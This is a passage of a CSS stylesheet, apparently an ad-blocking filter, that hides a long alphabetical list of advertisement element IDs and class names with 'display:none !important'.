#post5_adbox,#post_ad,#premium_ad,#priceGrabberAd,#prime-ad-space,#print-header-ad,#print_ads,#printads,#product-adsense,#promo-ad,#promoAds,#ps-vertical-ads,#pub468x60,#publicidad,#pushdown_ad,#qm-ad-big-box,#qm-ad-sky,#qm-dvdad,#quigo_ad,#r1SoftAd,#rail_ad1,#rail_ad2,#realEstateAds,#rectAd,#rect_ad,#rectangle-ad,#rectangleAd,#rectangle_ad,#refine-300-ad,#region-node-advert,#region-top-ad,#relocation_ad_container,#rh-ad-container,#rh_tower_ad,#rhapsodyAd,#rhs_ads,#rhsadvert,#right-ad,#right-ad-col,#right-ad-skin,#right-ad-title,#right-ad1,#right-ads-3,#right-advert,#right-bar-ad,#right-box-ad,#right-featured-ad,#right-mpu-1-ad-container,#right-uppder-adverts,#right-uppder-adverts-container,#rightAd,#rightAd300x250,#rightAd300x250Lower,#rightAdBar,#rightAdColumn,#rightAd_rdr,#rightAdsDiv,#rightColAd,#rightColumnMpuAd,#rightColumnSkyAd,#right_ad,#right_ad_wrapper,#right_ads,#right_advert,#right_advertisement,#right_advertising,#right_column_ad_container,#right_column_ads,#right_column_adverts,#right_column_internal_ad_container,#right_column_top_ad_unit,#rightad,#rightadContainer,#rightads,#rightadvertbar-doubleclickads,#rightbar-ad,#rightcolhouseads,#rightcolumn_300x250ad,#rightgoogleads,#rightinfoad,#rightside-ads,#rightside_ad,#righttop-adverts,#righttop-adverts-container,#rm_ad_text { display:none !important; } #ros_ad,#rotatingads,#row2AdContainer,#rprightHeaderAd,#rr_MSads,#rt-ad,#rt-ad-top,#rt-ad468,#rtMod_ad,#rtmod_ad,#sAdsBox,#sb-ad-sq,#sb_ad_links,#sb_advert,#search-google-ads,#search-sponsored-links,#search-sponsored-links-top,#searchAdSenseBox,#searchAdSenseBoxAd,#searchAdSkyscraperBox,#search_ads,#search_result_ad,#sec_adspace,#second-adlayer,#secondBoxAdContainer,#secondrowads,#sect-ad-300x100,#sect-ad-300x250-2,#section-ad-1-728,#section-ad-300-250,#section-ad-4-160,#section-blog-ad,#section-container-ddc_ads,#section_advertisements,#section_advertorial_feature,#servfail-ads,#sew-ad1,#shoppingads,#shortads,#show-ad,#showAd,#showad,#side-ad,#side-ad-container,#side-ads,#sideAd,#sideAd1,#sideAd2,#sideAdSub,#sideAds,#sideBarAd,#side_ad,#side_ad_wrapper,#side_ads_by_google,#side_sky_ad,#sidead,#sideads,#sideadtop-to,#sidebar-125x125-ads,#sidebar-125x125-ads-below-index,#sidebar-ad,#sidebar-ad-boxes,#sidebar-ad-space,#sidebar-ad-wrap,#sidebar-ad3,#sidebar-ads,#sidebar-adv,#sidebar-sponsor-link,#sidebar2ads,#sidebar_ad,#sidebar_ad_widget,#sidebar_ads,#sidebar_ads_180,#sidebar_sponsoredresult_body,#sidebar_txt_ad_links,#sidebarad,#sidebaradpane,#sidebarads,#sidebaradver_advertistxt,#sideline-ad,#single-mpu,#singlead,#site-ad-container,#site-leaderboard-ads,#site_top_ad,#sitead,#sky-ad,#skyAd,#skyAdContainer,#skyScrapperAd,#skyWrapperAds,#sky_ad,#sky_advert,#skyads,#skyadwrap,#skyline_ad,#skyscrapeAd,#skyscraper-ad,#skyscraperAd,#skyscraperAdContainer,#skyscraper_ad,#skyscraper_advert,#skyscraperad,#slide_ad,#sliderAdHolder,#slideshow_ad_300x250,#sm-banner-ad,#small_ad,#small_ad_banners_vertical,#small_ads,#smallerAd,#some-ads,#some-more-ads,#specialAd_one,#specialAd_two,#specialadvertisingreport_container,#specials_ads,#speeds_ads,#speeds_ads_fstitem,#speedtest_mrec_ad,#sphereAd,#spnAds,#sponlink,#sponlinks,#sponsAds,#sponsLinks,#sponseredlinks,#sponsorAd1,#sponsorAd2,#sponsorAdDiv,#sponsorLinks,#sponsorTextLink,#sponsor_banderole,#sponsor_deals,#sponsored,#sponsored-ads,#sponsored-features,#sponsored-links,#sponsored-listings,#sponsored-resources,#sponsored1,#sponsoredBox1,#sponsoredBox2,#sponsoredLinks,#sponsoredLinks_Top,#sponsoredList,#sponsoredResults,#sponsoredResultsWide,#sponsoredSiteMainline,#sponsoredSiteSidebar,#sponsored_ads_v4,#sponsored_container,#sponsored_content,#sponsored_game_row_listing,#sponsored_head,#sponsored_link,#sponsored_link_bottom,#sponsored_links,#sponsored_v12,#sponsoredads,#sponsoredlinks,#sponsoredlinks_cntr,#sponsoredlinkslabel,#sponsoredresults_top,#sponsoredwellcontainerbottom,#sponsoredwellcontainertop,#sponsorlink,#spotlightAds,#spotlightad,#sqAd,#squareAd,#squareAdSpace,#squareAds,#square_ad,#srp_adsense-top,#start_middle_container_advertisment,#sticky-ad,#stickyBottomAd,#story-90-728-area,#story-ad-a,#story-ad-b,#story-leaderboard-ad,#story-sponsoredlinks,#storyAd,#storyAdWrap,#storyad2,#submenu-ads,#subpage-ad-right,#subpage-ad-top,#swads,#synch-ad,#systemad_background,#tabAdvertising,#takeoverad,#tblAd,#tbl_googlead,#tcwAd,#td-GblHdrAds,#template_ad_leaderboard,#tertiary_advertising,#test_adunit_160_article,#text-ad,#text-ads,#text-link-ads,#textAd,#textAds,#text_ad,#text_ads,#text_advert,#textad,#textad3,#textad_block,#the-last-ad-standing,#thefooterad,#themis-ads,#tile-ad,#tmglBannerAd,#tmp2_promo_ad,#toolbarSlideUpAd,#top-ad,#top-ad-container,#top-ad-menu,#top-ads,#top-ads-tabs,#top-advertisement,#top-banner-ad,#top-search-ad-wrapper,#topAd,#topAd728x90,#topAdBanner,#topAdBox,#topAdContainer,#topAdSenseDiv,#topAdcontainer,#topAds,#topAdsContainer,#topAdvBox,#topAdvert,#topAdvert-09,#topBannerAd,#topBannerAdContainer,#topContentAdTeaser,#topNavLeaderboardAdHolder,#topOverallAdArea,#topRightBlockAdSense,#topSponsoredLinks,#top_ad,#top_ad-sense,#top_ad_area,#top_ad_banner,#top_ad_game,#top_ad_unit,#top_ad_wrapper,#top_ad_zone,#top_ads,#top_ads_wrap,#top_advertise,#top_advertising,#top_rectangle_ad,#top_right_ad,#top_wide_ad,#topad,#topad1,#topad2,#topad_left,#topad_right,#topadbar,#topadblock,#topaddwide,#topads,#topadsense,#topadspace,#topadwrap,#topadzone,#topbanner_ad,#topbannerad,#topbar-ad,#topcustomad,#topleaderboardad,#topnav-ad-shell,#topnavad,#toprightAdvert,#toprightad,#topsponsored,#toptextad,#tour300Ad,#tour728Ad,#tourSponsoredLinksContainer,#towerad,#ts-ad_module,#ttp_ad_slot1,#ttp_ad_slot2,#twogamesAd,#txfPageMediaAdvertVideo,#txt_link_ads,#txtads,#undergameAd,#upper-ads,#upperAdvertisementImg,#upperMpu,#upper_small_ad,#upperad,#urban_contentad_1,#urban_contentad_2,#urban_contentad_article,#v_ad,#vap_adsense-top,#vert-ads,#vert_ad,#vert_ad_placeholder,#vertical_ad,#vertical_ads,#videoAd,#videoAdvert,#video_ads_overdiv,#video_advert2,#video_advert3,#video_cnv_ad,#video_overlay_ad,#videoadlogo,#view_ads,#view_ads_advertisements,#viewads,#viewportAds,#viewvid_ad300x250,#wXcds12-ad,#wall_advert,#wallpaper-ad-link,#wallpaperAd_left,#wallpaperAd_right,#walltopad,#weblink_ads_container,#welcomeAdsContainer,#welcome_ad_mrec,#welcome_advertisement,#wf_ContentAd,#wf_FrontSingleAd,#wf_SingleAd,#wf_bottomContentAd,#wgtAd,#whatsnews_top_ad,#whitepaper-ad,#whoisRightAdContainer,#wide_ad_unit_top,#wideskyscraper_160x600_left,#wideskyscraper_160x600_right,#widget_Adverts,#widget_advertisement,#widgetwidget_adserve2,#wrapAdRight,#wrapAdTop,#wrapperAdsTopLeft,#wrapperAdsTopRight,#xColAds,#y-ad-units,#y708-ad-expedia,#y708-ad-lrec,#y708-ad-partners,#y708-ad-ysm,#y708-advertorial-marketplace,#yahoo-ads,#yahoo-sponsors,#yahooSponsored,#yahoo_ads,#yahoo_ads_2010,#yahoo_text_ad,#yahooad-tbl,#yan-sponsored,#yatadsky,#ybf-ads,#yfi_fp_ad_mort,#yfi_fp_ad_nns,#yfi_pf_ad_mort,#ygrp-sponsored-links,#ymap_adbanner,#yn-gmy-ad-lrec,#yreSponsoredLinks,#ysm_ad_iframe,#zoneAdserverMrec,#zoneAdserverSuper,.ADBAR,.ADPod,.AD_ALBUM_ITEMLIST,.AD_MOVIE_ITEM,.AD_MOVIE_ITEMLIST,.AD_MOVIE_ITEMROW,.ADbox,.Ad-300x100,.Ad-Container-976x166,.Ad-Header,.Ad-MPU,.Ad-Wrapper-300x100,.Ad120x600,.Ad160x600,.Ad160x600left,.Ad160x600right,.Ad247x90,.Ad300x,.Ad300x250,.Ad300x250L,.Ad728x90,.AdBorder,.AdBox,.AdBox7,.AdContainerBox308,.AdContainerModule,.AdHeader,.AdHere,.AdInfo,.AdInline,.AdMedium,.AdPlaceHolder,.AdProS728x90Container,.AdProduct,.AdRingtone,.AdSense,.AdSenseLeft,.AdSlot,.AdSpace,.AdTextSmallFont,.AdTitle,.AdUnit,.AdUnit300,.Ad_C,.Ad_D_Wrapper,.Ad_E_Wrapper,.Ad_Right,.AdsBottom,.AdsBoxBottom,.AdsBoxSection,.AdsBoxTop,.AdsLinks1,.AdsLinks2,.AdsRec,.AdvBoxSidebar,.Advert,.Advert300x250,.AdvertMidPage,.AdvertiseWithUs,.Advertisement,.AdvertisementTextTag,.Advman_Widget,.ArticleAd,.ArticleInlineAd,.BCA_Advertisement,.Banner300x250,.BannerAd,.BigBoxAd,.BlockAd,.BlueTxtAdvert,.BottomAdContainer,.BottomAffiliate,.BoxAd,.CG_adkit_leaderboard,.CG_details_ad_dropzone,.CWReviewsProdInfoAd,.ComAread,.CommentAd,.ContentAd,.ContentAds,.DAWRadvertisement,.DeptAd,.DisplayAd,.FT_Ad,.FeaturedAdIndexAd,.FlatAds,.FooterAds,.GOOGLE_AD,.GoogleAd,.GoogleAdSenseBottomModule,.GoogleAdSenseRightModule,.HPG_Ad_B,.HPNewAdsBannerDiv,.HPRoundedAd,.HeaderAds,.HomeContentAd,.IABAdSpace,.InArticleAd,.IndexRightAd,.LazyLoadAd,.LeftAd,.LeftButtonAdSlot,.LeftTowerAd,.M2Advertisement,.MD_adZone,.MOS-ad-hack,.MPUHolder,.MPUTitleWrapperClass,.MREC_ads,.MiddleAd,.MiddleAdContainer,.MiddleAdvert,.NewsAds,.OpaqueAdBanner,.OpenXad,.PU_DoubleClickAdsContent,.Post5ad,.Post8ad,.Post9ad,.RBboxAd,.RW_ad300,.RectangleAd,.RelatedAds,.Right300x250AD,.RightAd1,.RightAdvertiseArea,.RightAdvertisement,.RightGoogleAFC,.RightRailAd,.RightRailTop300x250Ad,.RightSponsoredAdTitle,.RightTowerAd,.STR_AdBlock,.SectionSponsor,.SideAdCol,.SidebarAd,.SidebarAdvert,.SitesGoogleAdsModule,.SkyAdContainer,.SponsoredAdTitle,.SponsoredContent,.SponsoredLinkItemTD,.SponsoredLinks,.SponsoredLinksGrayBox,.SponsoredLinksModule,.SponsoredLinksPadding,.SponsoredLinksPanel,.Sponsored_link,.SquareAd,.StandardAdLeft,.StandardAdRight,.TRU-onsite-ads-leaderboard,.TextAd,.TheEagleGoogleAdSense300x250,.TopAd,.TopAdContainer,.TopAdL,.TopAdR,.TopBannerAd,.UIWashFrame_SidebarAds,.UnderAd,.VerticalAd,.Video-Ad,.VideoAd,.WidgetAdvertiser,.a160x600,.a728x90,.ad-120x60,.ad-120x600,.ad-160,.ad-160x600,.ad-160x600x1,.ad-160x600x2,.ad-160x600x3,.ad-250,.ad-300,.ad-300-block,.ad-300-blog,.ad-300x100,.ad-300x250,.ad-300x250-first,.ad-300x250-right0,.ad-300x600,.ad-350,.ad-355x75,.ad-600,.ad-635x40,.ad-728,.ad-728x90,.ad-728x90-1,.ad-728x90-top0,.ad-728x90_forum,.ad-90x600,.ad-above-header,.ad-adlink-bottom,.ad-adlink-side,.ad-area,.ad-background,.ad-banner,.ad-banner-smaller,.ad-bigsize,.ad-block,.ad-block-square,.ad-blog2biz,.ad-body,.ad-bottom,.ad-box,.ad-break,.ad-btn,.ad-btn-heading,.ad-button,.ad-cell,.ad-column,.ad-container,.ad-container-300x250,.ad-container-728x90,.ad-container-994x282,.ad-context,.ad-disclaimer,.ad-display,.ad-div,.ad-enabled,.ad-feedback,.ad-filler,.ad-flex,.ad-footer,.ad-footer-leaderboard,.ad-forum,.ad-google,.ad-graphic-large,.ad-gray,.ad-grey,.ad-hdr,.ad-head,.ad-header,.ad-heading,.ad-holder,.ad-homeleaderboard,.ad-img,.ad-in-post,.ad-index-main,.ad-inline,.ad-island,.ad-item,.ad-label,.ad-leaderboard,.ad-left,.ad-link,.ad-links,.ad-lrec,.ad-medium,.ad-medium-two,.ad-mpl,.ad-mpu,.ad-msn,.ad-note,.ad-notice,.ad-other,.ad-permalink,.ad-place-active,.ad-placeholder,.ad-postText,.ad-poster,.ad-priority,.ad-rect,.ad-rectangle,.ad-rectangle-text,.ad-related,.ad-rh,.ad-ri,.ad-right,.ad-right-header,.ad-right-txt,.ad-row,.ad-section,.ad-show-label,.ad-side,.ad-sidebar,.ad-sidebar-outer,.ad-sidebar300,.ad-sky,.ad-skyscr,.ad-skyscraper,.ad-slot,.ad-slot-234-60,.ad-slot-300-250,.ad-slot-728-90,.ad-source,.ad-space,.ad-space-mpu-box,.ad-space-topbanner,.ad-spot,.ad-square,.ad-square300,.ad-squares,.ad-statement,.ad-story-inject,.ad-tabs,.ad-text,.ad-text-links,.ad-tile,.ad-title,.ad-top,.ad-top-left,.ad-unit,.ad-unit-300,.ad-unit-300-wrapper,.ad-unit-anchor,.ad-unit-top,.ad-vert,.ad-vertical-container,.ad-vtu,.ad-widget-list,.ad-with-us,.ad-wrap,.ad-wrapper,.ad-zone,.ad-zone-s-q-l,.ad.super,.ad08sky,.ad100,.ad120,.ad120x240backgroundGray,.ad120x600,.ad125,.ad140,.ad160,.ad160600,.ad160x600,.ad160x600GrayBorder,.ad200x60,.ad230,.ad250,.ad250c,.ad300,.ad300250,.ad300_250,.ad300x100,.ad300x250,.ad300x250-hp-features,.ad300x250Module,.ad300x250Top,.ad300x250_container,.ad300x250box,.ad300x50-right,.ad300x600,.ad310,.ad315,.ad336x280,.ad343x290,.ad400right,.ad450,.ad468,.ad468_60,.ad468x60,.ad540x90,.ad600,.ad620x70,.ad626X35,.ad644,.ad728,.ad728_90,.ad728x90,.ad728x90_container,.ad90x780,.adAgate,.adArea674x60,.adBanner,.adBanner300x250,.adBanner728x90,.adBannerTyp1,.adBannerTypSortableList,.adBannerTypW300,.adBar,.adBgBottom,.adBgMId,.adBgTop,.adBlock,.adBottomLink,.adBottomboxright,.adBox,.adBox1,.adBox230X96,.adBox728X90,.adBoxBody,.adBoxBorder,.adBoxContainer,.adBoxContent,.adBoxInBignews,.adBoxSidebar,.adBoxSingle,.adBwrap,.adCMRight,.adCell,.adColumn,.adCont,.adContTop,.adContainer,.adContentAd,.adContour,.adCreative,.adCube,.adDiv,.adElement,.adFender3,.adFrame,.adFtr,.adFullWidthMiddle,.adGoogle,.adHeader,.adHeadline,.adHolder,.adHome300x250,.adHorisontal,.adInNews,.adIsland,.adLabel,.adLeader,.adLeaderForum,.adLeaderboard,.adLeft,.adLoaded,.adLocal,.adMPU,.adMarker,.adMastheadLeft,.adMastheadRight,.adMegaBoard,.adMinisLR,.adMkt2Colw,.adModule,.adModuleAd,.adMpu,.adNewsChannel,.adNoOutline,.adNotice,.adNoticeOut,.adObj,.adPageBorderL,.adPageBorderR,.adPanel,.adPod,.adRect,.adResult,.adRight,.adSKY,.adSelfServiceAdvertiseLink,.adServer,.adSky,.adSky600,.adSkyscaper,.adSkyscraperHolder,.adSlot,.adSpBelow,.adSpace,.adSpacer,.adSplash,.adSponsor,.adSpot,.adSpot-brought,.adSpot-searchAd,.adSpot-textBox,.adSpot-twin,.adSpotIsland,.adSquare,.adSubColPod,.adSummary,.adSuperboard,.adSupertower,.adTD,.adTab,.adTag,.adText,.adTileWrap,.adTiler,.adTitle,.adTopLink,.adTopboxright,.adTout,.adTxt,.adUnit,.adUnitHorz,.adUnitVert,.adUnitVert_noImage,.adWebBoard,.adWidget,.adWithTab,.adWord,.adWrap,.adWrapper,.ad_0,.ad_1,.ad_120x90,.ad_125,.ad_130x90,.ad_160,.ad_160x600,.ad_2,.ad_200,.ad_200x200,.ad_250x250,.ad_250x250_w,.ad_3,.ad_300,.ad_300_250,.ad_300x250,.ad_300x250_box_right,.ad_336,.ad_336x280,.ad_350x100,.ad_350x250,.ad_400x200,.ad_468,.ad_468x60,.ad_600,.ad_680x15,.ad_728,.ad_728_90b,.ad_728x90,.ad_925x90,.ad_Left,.ad_Right,.ad_ad_300,.ad_amazon,.ad_banner,.ad_banner_border,.ad_bar,.ad_bg,.ad_bigbox,.ad_biz,.ad_block,.ad_block_338,.ad_body,.ad_border,.ad_botbanner,.ad_bottom,.ad_bottom_leaderboard,.ad_bottom_left,.ad_box,.ad_box2,.ad_box_ad,.ad_box_div,.ad_callout,.ad_caption,.ad_column,.ad_column_box,.ad_column_hl,.ad_contain,.ad_container,.ad_content,.ad_content_wide,.ad_contents,.ad_descriptor,.ad_disclaimer,.ad_eyebrow,.ad_footer,.ad_frame,.ad_framed,.ad_front_promo,.ad_gutter_top,.ad_head,.ad_header,.ad_heading,.ad_headline,.ad_holder,.ad_hpm,.ad_image,.ad_info_block,.ad_inline,.ad_island,.ad_jnaught,.ad_label,.ad_launchpad,.ad_leader,.ad_leaderboard,.ad_left,.ad_line,.ad_link,.ad_links,.ad_linkunit,.ad_loc,.ad_lrec,.ad_main,.ad_medrec,.ad_medrect,.ad_middle,.ad_mod,.ad_mp,.ad_mpu,.ad_mr,.ad_mrec,.ad_mrec_title_article,.ad_mrect,.ad_news,.ad_note,.ad_notice,.ad_one,.ad_p360,.ad_partner,.ad_partners,.ad_plus,.ad_post,.ad_power,.ad_primary,.ad_promo,.ad_rec,.ad_rectangle,.ad_right,.ad_right_col,.ad_row,.ad_row_bottom_item,.ad_side,.ad_sidebar,.ad_skyscraper,.ad_slug,.ad_slug_table,.ad_space,.ad_space_300_250,.ad_spacer,.ad_sponsor { display:none !important; } .ad_sponsoredsection,.ad_spot_b,.ad_spot_c,.ad_square_r,.ad_square_top,.ad_sub,.ad_tag_middle,.ad_text,.ad_text_w,.ad_title,.ad_top,.ad_top_leaderboard,.ad_top_left,.ad_topright,.ad_tower,.ad_unit,.ad_unit_rail,.ad_url,.ad_warning,.ad_wid300,.ad_wide,.ad_wrap,.ad_wrapper,.ad_wrapper_fixed,.ad_wrapper_top,.ad_wrp,.ad_zone,.adarea,.adarea-long,.adbanner,.adbannerbox,.adbannerright,.adbar,.adboard,.adborder,.adbot,.adbottom,.adbottomright,.adbox-outer,.adbox-wrapper,.adbox_300x600,.adbox_366x280,.adbox_468X60,.adbox_bottom,.adbox_br,.adbox_left,.adboxclass,.adboxesrow,.adbreak,.adbug,.adbutton,.adbuttons,.adcode,.adcol1,.adcol2,.adcolumn,.adcolumn_wrapper,.adcont,.adcopy,.add_300x250,.addiv,.adenquire,.adfieldbg,.adfoot,.adfootbox,.adframe,.adhead,.adhead_h,.adhead_h_wide,.adheader,.adheader100,.adheader416,.adhi,.adhint,.adholder,.adhoriz,.adiframe,.adinfo,.adinside,.adintro,.adits,.adjlink,.adkicker,.adkit,.adkit-advert,.adkit-lb-footer,.adlabel-horz,.adlabel-vert,.adlabelleft,.adlayer,.adleader,.adleaderboard,.adleft1,.adline,.adlink,.adlinks,.adlist,.adlnklst,.admarker,.admediumred,.admedrec,.admessage,.admodule,.admpu,.admpu-small,.adnation-banner,.adnotice,.adops,.adp-AdPrefix,.adpadding,.adpane,.adpic,.adprice,.adproxy,.adrec,.adright,.adroot,.adrotate_widget,.adrow,.adrow-post,.adrow1box1,.adrow1box3,.adrow1box4,.adrule,.ads-125,.ads-300,.ads-300x250,.ads-728x90-wrap,.ads-ads-top,.ads-banner,.ads-below-content,.ads-categories-bsa,.ads-custom,.ads-favicon,.ads-item,.ads-links-general,.ads-mpu,.ads-outer,.ads-profile,.ads-right,.ads-section,.ads-sidebar,.ads-sky,.ads-small,.ads-sponsors,.ads-stripe,.ads-text,.ads-top,.ads-wide,.ads-widget,.ads-widget-partner-gallery,.ads03,.ads160,.ads1_250,.ads24Block,.ads300,.ads460,.ads460_home,.ads468,.ads728,.ads728x90,.adsArea,.adsBelowHeadingNormal,.adsBlock,.adsBottom,.adsBox,.adsCell,.adsCont,.adsDiv,.adsFull,.adsImages,.adsInsideResults_v3,.adsMPU,.adsMiddle,.adsRight,.adsRow,.adsTextHouse,.adsTop,.adsTower2,.adsTowerWrap,.adsWithUs,.ads_125_square,.ads_180,.ads_300,.ads_300x100,.ads_300x250,.ads_320,.ads_337x280,.ads_728x90,.ads_big,.ads_big-half,.ads_box,.ads_box_headline,.ads_brace,.ads_catDiv,.ads_container,.ads_disc_anchor,.ads_disc_leader,.ads_disc_lwr_square,.ads_disc_skyscraper,.ads_disc_square,.ads_div,.ads_footer,.ads_header,.ads_holder,.ads_horizontal,.ads_leaderboard,.ads_lr_wrapper,.ads_medrect,.ads_mpu,.ads_outer,.ads_post_end,.ads_post_end_code,.ads_post_start,.ads_post_start_code,.ads_rectangle,.ads_remove,.ads_right,.ads_rightbar_top,.ads_sc_bl_i,.ads_sc_tb,.ads_sc_tl_i,.ads_show_if,.ads_side,.ads_sidebar,.ads_singlepost,.ads_spacer,.ads_takeover,.ads_title,.ads_top,.ads_top_promo,.ads_tr,.ads_verticalSpace,.ads_vtlLink,.ads_widesky,.ads_wrapperads_top,.adsafp,.adsbg300,.adsblockvert,.adsborder,.adsbottom,.adsbox,.adsboxitem,.adsbttmpg,.adsbyyahoo,.adscaleAdvert,.adscaleP6_canvas,.adsclick,.adscontainer,.adscreen,.adsd_shift100,.adsection_a2,.adsection_c2,.adsense-468,.adsense-ad,.adsense-category,.adsense-category-bottom,.adsense-googleAds,.adsense-heading,.adsense-overlay,.adsense-post,.adsense-right,.adsense-title,.adsense3,.adsense300,.adsenseAds,.adsenseBlock,.adsenseContainer,.adsenseGreenBox,.adsenseInPost,.adsenseList,.adsense_bdc_v2,.adsense_mpu,.adsensebig,.adsenseblock,.adsenseblock_bottom,.adsenseblock_top,.adsenselr,.adsensem_widget,.adsensesq,.adsenvelope,.adserver_zone,.adset,.adsforums,.adsghori,.adsgvert,.adshome,.adside,.adsidebox,.adsider,.adsingle,.adsleft,.adsleftblock,.adslink,.adslogan,.adslotleft,.adslotright,.adsmalltext,.adsmessage,.adsnippet_widget,.adspace,.adspace-MR,.adspace-widget,.adspace180,.adspace_bottom,.adspace_buysell,.adspace_rotate,.adspace_skyscraper,.adspacer,.adspot,.adspot728x90,.adstext,.adstextpad,.adstitle,.adstop,.adstory,.adstrip,.adtab,.adtable,.adtag,.adtech,.adtext,.adtext_gray,.adtext_horizontal,.adtext_onwhite,.adtext_vertical,.adtile,.adtips,.adtips1,.adtitle,.adtop,.adtravel,.adtxt,.adtxtlinks,.adunit,.adv-mpu,.adv-p,.adv-sidebar,.adv300,.advBox,.advSquare,.advVideobox,.adv_120x600,.adv_300x250,.adv_728x90,.adv_banner_hor,.adv_medium_rectangle,.adver,.adverTag,.adverTxt,.adver_cont_below,.advert-300-side,.advert-300x100-side,.advert-728x90,.advert-article-bottom,.advert-bannerad,.advert-bg-250,.advert-bloggrey,.advert-box,.advert-btm,.advert-head,.advert-horizontal,.advert-iab-300-250,.advert-iab-468-60,.advert-mpu,.advert-skyscraper,.advert-text,.advert-title,.advert-txt,.advert120,.advert300,.advert300x250,.advert300x300,.advert300x440,.advert350ih,.advert4,.advert5,.advert728x90,.advert8,.advertColumn,.advertCont,.advertContainer,.advertContent,.advertHeadline,.advertIslandWrapper,.advertRight,.advertSuperBanner,.advertText,.advertTitleSky,.advert_336,.advert_468x60,.advert_box,.advert_cont,.advert_container,.advert_djad,.advert_google_content,.advert_google_title,.advert_home_300,.advert_label,.advert_leaderboard,.advert_list,.advert_note,.advert_surr,.advert_top,.advertheader-red,.advertise,.advertise-here,.advertise-homestrip,.advertise-horz,.advertise-inquiry,.advertise-leaderboard,.advertise-list,.advertise-top,.advertise-vert,.advertiseContainer,.advertiseText,.advertise_ads,.advertise_here,.advertise_link,.advertise_link_sidebar,.advertisement,.advertisement-728x90,.advertisement-block,.advertisement-sidebar,.advertisement-space,.advertisement-sponsor,.advertisement-swimlane,.advertisement-text,.advertisement-top,.advertisement300x250,.advertisement468,.advertisementBox,.advertisementColumnGroup,.advertisementContainer,.advertisementHeader,.advertisementLabel,.advertisementPanel,.advertisementText,.advertisement_300x250,.advertisement_btm,.advertisement_caption,.advertisement_g,.advertisement_header,.advertisement_horizontal,.advertisement_top,.advertisementsOutterDiv,.advertiser,.advertiser-links,.advertisespace_div,.advertising-banner,.advertising-header,.advertising-leaderboard,.advertising-local-links,.advertising2,.advertisingTable,.advertising_block,.advertising_images,.advertisment,.advertisment_bar,.advertisment_caption,.advertisment_two,.advertize,.advertize_here,.advertorial,.advertorial-2,.advertorial-promo-box,.advertorial_red,.advertorialtitle,.adverts,.adverts-125,.adverts_RHS,.advt,.advt-banner-3,.advt-block,.advt-sec,.advt300,.advt720,.advtitle,.adwhitespace,.adwordListings,.adwords,.adwordsHeader,.adwrap,.adwrapper-lrec,.adwrapper948,.adzone-footer,.adzone-sidebar,.affiliate-link,.affiliate-sidebar,.affiliateAdvertText,.affiliates-sidebar,.affinityAdHeader,.afsAdvertising,.after_ad,.agi-adsaleslinks,.alb-content-ad,.alignads,.alt_ad,.anchorAd,.another_text_ad,.answer_ad_content,.aolSponsoredLinks,.aopsadvert,.apiAdMarkerAbove,.apiAds,.app_advertising_skyscraper,.archive-ads,.art_ads,.article-ad-box,.article-ads,.article-content-adwrap,.articleAd,.articleAd300x250,.articleAds,.articleAdsL,.articleEmbeddedAdBox,.article_ad,.article_adbox,.article_mpu_box,.article_page_ads_bottom,.articleads,.aseadn,.aux-ad-widget-1,.aux-ad-widget-2,.b-astro-sponsored-links_horizontal,.b-astro-sponsored-links_vertical,.b_ads_cont,.b_ads_top,.banmanad,.banner-468-60,.banner-468x60,.banner-ad,.banner-ads,.banner-adv,.banner-advert,.banner-adverts,.banner-buysellads,.banner160x600,.banner300by250,.banner300x100,.banner300x250,.banner468,.banner468by60,.banner728x90,.bannerADV,.bannerAd,.bannerAdWrapper300x250,.bannerAdWrapper730x86,.bannerAds,.bannerAdvert,.bannerRightAd,.banner_160x600,.banner_300x250,.banner_728x90,.banner_ad,.banner_ad_footer,.banner_ad_leaderboard,.bannerad,.bannerad-125tower,.bannerad-468x60,.barkerAd,.base-ad-mpu,.base_ad,.base_printer_widgets_AdBreak,.bg-ad-link,.bgnavad,.big-ads,.bigAd,.big_ad,.big_ads,.bigad,.bigad2,.bigbox_ad,.bigboxad,.billboard300x250,.billboard_ad,.biz-ad,.biz-ads,.biz-adtext,.blk_advert,.block-ad,.block-ad300,.block-admanager,.block-ads-bottom,.block-ads-top,.block-adsense,.block-adsense-managed,.block-adspace-full,.block-bg-advertisement-region-1,.block-deca_advertising,.block-google-admanager,.block-google_admanager,.block-openads,.block-openadstream,.block-openx,.block-thirdage-ads,.block-wtg_adtech,.blockAd,.blockAds,.block_ad,.block_ad_floating_bar,.block_ad_sb_text,.block_ad_sb_text2,.block_ad_sponsored_links,.block_ad_sponsored_links-wrapper,.block_ad_sponsored_links_localized,.blockad,.blocked-ads,.blog-ad-leader-inner,.blog-ads-container,.blogAd,.blogAdvertisement,.blogArtAd,.blogBigAd,.blog_ad,.blogads,.blox3featuredAd,.bn_textads,.body_ad,.body_sponsoredresults_bottom,.body_sponsoredresults_middle,.body_sponsoredresults_top,.bodyads,.bodyads2,.bookseller-header-advt,.bottom-ad,.bottom-ad-fr,.bottom-ads,.bottomAd,.bottomAds,.bottom_ad,.bottom_ad_block,.bottom_ads,.bottom_adsense,.bottom_right_ad,.bottomad,.bottomads,.bottomadvert,.bottombarad,.bottomrightrailAd,.bottomvidad,.box-ad,.box-ad-grey,.box-ads,.box-ads-small,.box-adsense,.box-adverts,.boxAd,.boxAds,.boxAdsInclude,.box_ad,.box_ad_container,.box_ad_content,.box_ad_spacer,.box_ad_wrap,.box_ads,.box_adv,.box_adv_new,.box_advertising,.box_advertisment_62_border,.box_content_ad,.box_content_ads,.box_textads,.boxad,.boxads,.boxyads,.bps-ad-wrapper,.bps-advertisement,.bps-advertisement-inline-ads,.br-ad,.breakad_container,.brokerad,.bsa_ads,.btm_ad,.btm_ad_container,.btn-ad,.bullet-sponsored-links,.bullet-sponsored-links-gray,.burstContentAdIndex,.busrep_poll_and_ad_container,.buttonAd,.buttonAds,.button_ads,.button_advert,.buttonadbox,.buttonads,.bx_ad,.bx_ad_right,.cA-adStrap,.cColumn-TextAdsBox,.cLeftTextAdUnit,.c_ligatus_nxn,.calendarAd,.calloutAd,.carbonad,.carbonad-tag,.care2_adspace,.catalog_ads,.category-ad,.categorySponsorAd,.category__big_game_container_body_games_advertising,.cb-ad-banner,.cb-ad-container,.cb_ads,.cb_navigation_ad,.cbstv_ad_label,.cbzadvert,.cbzadvert_block,.cdAdTitle,.cdmainlineSearchAdParent,.cdo-ad-section,.cdsidebarSearchAdParent,.centerAd,.center_ad,.centerad,.centered-ad,.chitikaAdCopy,.cinemabotad,.classifiedAdThree,.clearerad,.cmAdContainer,.cmAdFind,.cmAdSponsoredLinksBox,.cm_ads,.cms-Advert,.cnbc_badge_banner_ad_area,.cnbc_banner_ad_area,.cnbc_leaderboard_ad,.cnn160AdFooter,.cnnAd,.cnnMosaic160Container,.cnnStoreAd,.cnnStoryElementBoxAd,.cnnWCAdBox,.cnn